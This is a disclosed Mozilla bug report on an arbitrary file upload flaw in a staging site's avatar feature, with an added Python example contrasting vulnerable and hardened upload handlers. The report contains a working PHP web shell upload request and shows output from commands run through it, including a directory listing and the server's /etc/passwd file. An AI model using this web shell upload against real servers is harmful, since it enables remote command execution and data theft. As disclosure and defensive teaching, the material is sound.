Arbitrary file uploading vulnerability in badger.stage.mozilla.com

Status: VERIFIED FIXED
Product: Websites
Component: Other
Priority: --
Severity: blocker
Reported: 7 years ago
Modified: 4 years ago

People
Reporter: Luca De Fulgentis
Assignee: Unassigned

Tracking
Version: unspecified
Bug Flags: sec-bounty+

Details
Whiteboard: [infrasec:osinject][ws:critical]

Description (Reporter, 7 years ago)
User-Agent:       Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Build Identifier: 

Hello Mozilla,
I found a critical vulnerability in badger.stage.mozilla.com's avatar image upload functionality. I was able to upload a PHP shell and execute commands on the remote server. The following is an HTTP request resulting in a web shell upload:

POST /avatar/change/ HTTP/1.1
Host: badger.stage.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://badger.stage.mozilla.com/avatar/change/
Cookie: csrftoken=c0660b8a28bcb9cb1d81cb8c39f0c7ff; sessionid=9b456284ccc6788d116b0655c6314d49
Content-Type: multipart/form-data; boundary=---------------------------8752007212818
Content-Length: 369

-----------------------------8752007212818
Content-Disposition: form-data; name="csrfmiddlewaretoken"

c0660b8a28bcb9cb1d81cb8c39f0c7ff
-----------------------------8752007212818
Content-Disposition: form-data; name="avatar"; filename="c.php"
Content-Type: application/octet-stream

<?php system($_GET['cmd']); ?>
-----------------------------8752007212818--

Here is the output of executing some commands via the remote shell:

http://badger.stage.mozilla.com/site_media/media/avatars/daath1/c.php?cmd=ls%20-al%20/data/www/www.mozilla.org/

total 488
drwxr-xr-x  46 root root   4096 May 31 20:20 .
drwxr-xr-x 115 root root   4096 Mar  1 20:05 ..
-rw-r--r--   1 root root 117388 Apr 19 19:50 .htaccess
drwxr-xr-x   6 root root   4096 May 31 20:20 .svn
-rw-r--r--   1 root root   1245 Apr 19 19:50 403.html
-rw-r--r--   1 root root   2376 Apr 19 19:50 404.html
-rw-r--r--   1 root root    697 Apr 19 19:50 410.html
-rw-r--r--   1 root root   1120 Apr 19 19:50 500.html
-rw-r--r--   1 root root    413 Aug 11  2009 503.html
drwxr-xr-x   5 root root   4096 May  4 06:52 MPL
-rw-r--r--   1 root root   1695 May 10 21:20 README
drwxr-xr-x   7 root root   4096 Apr 14 15:10 about
drwxr-xr-x  13 root root   4096 Feb 10 17:10 access
drwxr-xr-x   3 root root   4096 Aug 25  2009 book
drwxr-xr-x   4 root root   4096 Aug 21  2009 cache
drwxr-xr-x   5 root root   4096 Feb 10 17:10 causes
drwxr-xr-x   4 root root   4096 Feb 18 22:20 community
drwxr-xr-x   3 root root   4096 Dec  8 13:11 contact
drwxr-xr-x   7 root root   4096 May 27 13:30 contribute
drwxr-xr-x   3 root root   4096 Feb 10 17:10 credits
lrwxrwxrwx   1 root root      5 Aug 25  2009 css -> style
drwxr-xr-x   3 root root   4096 Feb 18 22:20 developer
drwxr-xr-x   9 root root   4096 Aug 26  2009 directory
drwxr-xr-x   8 root root   4096 Dec  8 13:10 docs
drwxr-xr-x   6 root root   4096 Feb  1 09:10 drumbeat
drwxr-xr-x   8 root root   4096 Dec  8 13:11 editor
-rw-r--r--   1 root root   1406 Jul 29  2009 favicon.ico
drwxr-xr-x   3 root root   4096 Feb 18 22:20 firefox
drwxr-xr-x  11 root root   4096 Feb 24 12:10 foundation
drwxr-xr-x  12 root root   4096 Dec  8 13:10 grants
drwxr-xr-x   7 root root   4096 Feb 10 17:10 hacking
drwxr-xr-x  12 root root  12288 Mar 23 15:01 images
drwxr-xr-x   6 root root   4096 May 11 13:10 includes
-rw-r--r--   1 root root  21581 Feb 10 17:10 index.de.html
-rw-r--r--   1 root root  21463 Feb 10 17:10 index.fr.html
-rw-r--r--   1 root root  21197 Feb 10 17:10 index.hr.html
-rw-r--r--   1 root root  20988 Apr 14 15:20 index.html
-rw-r--r--   1 root root  17234 May 31 20:20 index.pt-BR.html
-rw-r--r--   1 root root  21475 Feb 10 17:10 index.sq.html
drwxr-xr-x   6 root root   4096 May 30 08:30 join
drwxr-xr-x  12 root root   4096 Dec  8 13:11 js
drwxr-xr-x   4 root root   4096 Jul 29  2009 keymaster
drwxr-xr-x   4 root root   4096 Jul 29  2009 legal
drwxr-xr-x  11 root root   4096 Dec  8 13:10 newlayout
drwxr-xr-x   6 root root   4096 Feb 10 17:10 parks
drwxr-xr-x  10 root root   4096 Aug 25  2009 performance
drwxr-xr-x   5 root root   4096 May 18 12:01 phonebook
drwxr-xr-x   8 root root   4096 Aug 11  2009 ports
drwxr-xr-x   3 root root   4096 Feb 10 17:10 privacy
drwxr-xr-x  37 root root   4096 Feb 18 22:20 projects
drwxr-xr-x   4 root root   4096 Dec  8 13:11 rdf
-rw-r--r--   1 root root   1138 Oct 21  2009 refresh-press-center-feed.php
drwxr-xr-x   4 root root   4096 Feb 10 17:10 rhino
drwxr-xr-x   4 root root   4096 Dec  8 13:11 script
drwxr-xr-x   4 root root   4096 Aug 31  2009 scriptable
drwxr-xr-x   5 root root   4096 Feb 10 17:10 security
drwxr-xr-x   3 root root   4096 Dec  8 13:11 start
drwxr-xr-x   7 root root   4096 May 31 20:20 style
drwxr-xr-x   3 root root   4096 Dec  8 13:11 support
drwxr-xr-x   4 root root   4096 Dec  4  2009 test-l10n
drwxr-xr-x   5 root root   4096 Jul 29  2009 themes
drwxr-xr-x   4 root root   4096 Dec  8 13:10 unix

http://badger.stage.mozilla.com/site_media/media/avatars/daath1/c.php?cmd=cat%20/etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
nagios:x:100:101:nagios:/var/log/nagios:/bin/sh
apache:x:48:48:Apache:/var/www:/bin/bash
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
splunk:x:500:500:Splunk Server:/opt/splunk:/bin/false
hpsmh:x:101:501::/opt/hp/hpsmh:/sbin/nologin
ganglia:x:102:102:Ganglia Monitoring System:/var/lib/ganglia:/sbin/nologin
avahi-autoipd:x:103:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
memcached:x:104:104:Memcached daemon:/var/run/memcached:/sbin/nologin
processor:x:501:502::/home/processor:/bin/bash
lars:x:502:503::/home/lars:/bin/bash
rabbitmq:x:105:105:RabbitMQ messaging server:/var/lib/rabbitmq:/bin/bash
puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin

Thanks,
Luca.


Reproducible: Always
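The upload handling described in the report, as an added example that is not code from the badger application, from Mozilla, or from the reporter: a handler that behaves the way the bug did, next to a hardened one. The media root, the function names and the user name "daath1" are assumptions chosen to mirror the URL in the report; the PHP payload is the one the report shows, and the PNG bytes are a constructed sample.

```python
"""Avatar upload: the pattern behind this report next to a hardened version.

Added example, not code from the badger application or from Mozilla. The media
root, the function names and the user name "daath1" are assumptions chosen to
mirror the URL in the report.
"""
import os
import re
import secrets
import tempfile

# Constructed sample inputs: the payload from the report and a minimal PNG signature.
PHP_SHELL = b"<?php system($_GET['cmd']); ?>"
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\x0dIHDR" + b"\x00" * 17

# Magic bytes -> canonical extension. Only the types an avatar feature should accept.
IMAGE_SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
MAX_AVATAR_BYTES = 512 * 1024
USERNAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")  # no dots, so no ".." path components


class UploadRejected(ValueError):
    """Raised by the hardened handler when an upload fails validation."""


def avatar_dir(media_root, username):
    return os.path.join(media_root, "avatars", username)


def save_avatar_vulnerable(media_root, username, client_filename, data):
    """The bug class in the report: the client-supplied filename decides both where the
    bytes land and how the web server treats them. A .php name dropped into a directory
    that Apache hands to mod_php becomes a web shell; "../" in the name walks out of the
    avatar directory altogether. Returns the path the file would be written to."""
    return os.path.join(avatar_dir(media_root, username), client_filename)


def escapes_media_root(media_root, path):
    """True when a path (after normalizing "..") lies outside media_root/avatars."""
    avatars = os.path.abspath(os.path.join(media_root, "avatars"))
    return os.path.commonpath([avatars, os.path.abspath(path)]) != avatars


def sniff_image_extension(data):
    """Extension derived from the content, not from the filename or Content-Type header."""
    for magic, ext in IMAGE_SIGNATURES.items():
        if data.startswith(magic):
            return ext
    return None


def save_avatar_hardened(media_root, username, client_filename, data):
    """Validate type and size from the bytes, ignore the client filename entirely, and
    generate the stored name server-side. Returns the path; write_new_file() stores it."""
    if not USERNAME_RE.fullmatch(username):
        raise UploadRejected("bad username")
    if len(data) > MAX_AVATAR_BYTES:
        raise UploadRejected("avatar too large")
    ext = sniff_image_extension(data)
    if ext is None:
        raise UploadRejected("not a supported image type")
    # client_filename is deliberately unused: nothing attacker-chosen reaches the path.
    path = os.path.join(avatar_dir(media_root, username), f"{secrets.token_hex(16)}.{ext}")
    if escapes_media_root(media_root, path):  # defence in depth; USERNAME_RE already prevents this
        raise UploadRejected("path escapes media root")
    return path


def accepts_upload(media_root, username, client_filename, data):
    """Convenience wrapper: True if the hardened handler would store the upload."""
    try:
        save_avatar_hardened(media_root, username, client_filename, data)
    except UploadRejected:
        return False
    return True


def write_new_file(path, data):
    """Create-only write (O_EXCL) so an upload can never overwrite an existing file."""
    os.makedirs(os.path.dirname(path), exist_ok=True)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o644)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)


if __name__ == "__main__":
    root = tempfile.mkdtemp()
    print(save_avatar_vulnerable(root, "daath1", "c.php", PHP_SHELL))           # .../avatars/daath1/c.php
    print(save_avatar_vulnerable(root, "daath1", "../../../c.php", PHP_SHELL))  # walks out of the tree
    try:
        save_avatar_hardened(root, "daath1", "c.php", PHP_SHELL)
    except UploadRejected as exc:
        print("rejected:", exc)
    stored = save_avatar_hardened(root, "daath1", "c.php.png", PNG_SAMPLE)
    write_new_file(stored, PNG_SAMPLE)
    print("stored as", stored)
```

Two caveats a practitioner would add on top of this. Magic-byte sniffing does not stop polyglot files (a valid image header followed by PHP), so the robust application-side fix is to re-encode the image with an image library before storing it; that is left out here to keep the example dependency-free. Independently of the application, the directory that serves uploads should never be handed to a script interpreter: with Apache and mod_php that means disabling the PHP engine for the media directory (or serving uploads from a separate static host), so that even a file that slips through is returned as bytes rather than executed. The report shows exactly why that second layer matters: the avatar path was under the same document tree that executed .php.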
Updated (Reporter, 7 years ago)
Whiteboard: [ws:critical]

Comment 1 (7 years ago)
Thanks for the report Luca. We're looking into the issue now.
Severity: normal → blocker
Status: UNCONFIRMED → NEW
Ever confirmed: true
OS: Windows 7 → All
Hardware: x86 → All
Whiteboard: [ws:critical] → [infrasec:osinject][ws:critical]

Updated (7 years ago)
Depends on: 661356

Comment 2 (7 years ago)
Bug 661356 has been filed to disable the staging environment while we work on a fix. Thanks again for the report.
Depends on: 661444
Depends on: 661446

This bug qualifies for the full $3000 web bounty. Thanks!

badger.stage.mozilla.com is now offline per bug 661356. Closing this issue.
Status: NEW → RESOLVED
Last Resolved: 7 years ago
Resolution: --- → FIXED

Note: A root cause investigation for this issue is in progress and captured in bug 662805.

This issue has been resolved; however, bug 662805 contains some ongoing discussion of this and related issues.
Status: RESOLVED → VERIFIED
Group: websites-security

Updated (6 years ago)
Blocks: 836522
Flags: sec-bounty+